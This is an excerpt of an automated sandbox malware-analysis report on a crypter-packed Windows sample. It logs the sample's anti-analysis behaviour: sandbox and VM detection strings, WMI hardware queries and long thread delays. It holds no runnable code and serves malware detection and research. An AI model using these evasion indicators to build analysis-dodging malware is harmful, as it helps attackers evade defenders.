              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 4748Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1572Thread sleep count: 9837 > 30Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99734s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99623s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99388s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99252s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99130s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98888s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98779s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98558s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98164s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97608s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97387s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96918s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96624s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96514s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96294s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96186s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95530s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95310s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94969s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94484s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 3476Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -19369081277395017s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -100000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 4636Thread sleep count: 9758 > 30
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99764s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99546s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99323s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99218s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98725s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98604s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98186s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98053s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97893s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97735s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97594s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97454s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97297s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97151s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -96085s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -95901s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93632s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93516s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93089s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92977s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92766s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92547s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92328s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92109s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWindow / User API: threadDelayed 9837Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWindow / User API: threadDelayed 9758
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99859Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99734Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99623Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99500Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99388Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99252Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99130Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98888Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98779Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98671Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98558Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98406Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98281Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98164Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98047Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97937Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97828Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97719Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97608Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97500Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97387Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97250Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97140Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97031Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96918Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96750Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96624Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96514Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96406Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96294Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96186Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96078Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95968Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95859Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95750Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95640Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95530Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95422Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95310Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95187Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95078Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94969Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94812Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94703Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94593Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94484Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 100000
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99875
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99764
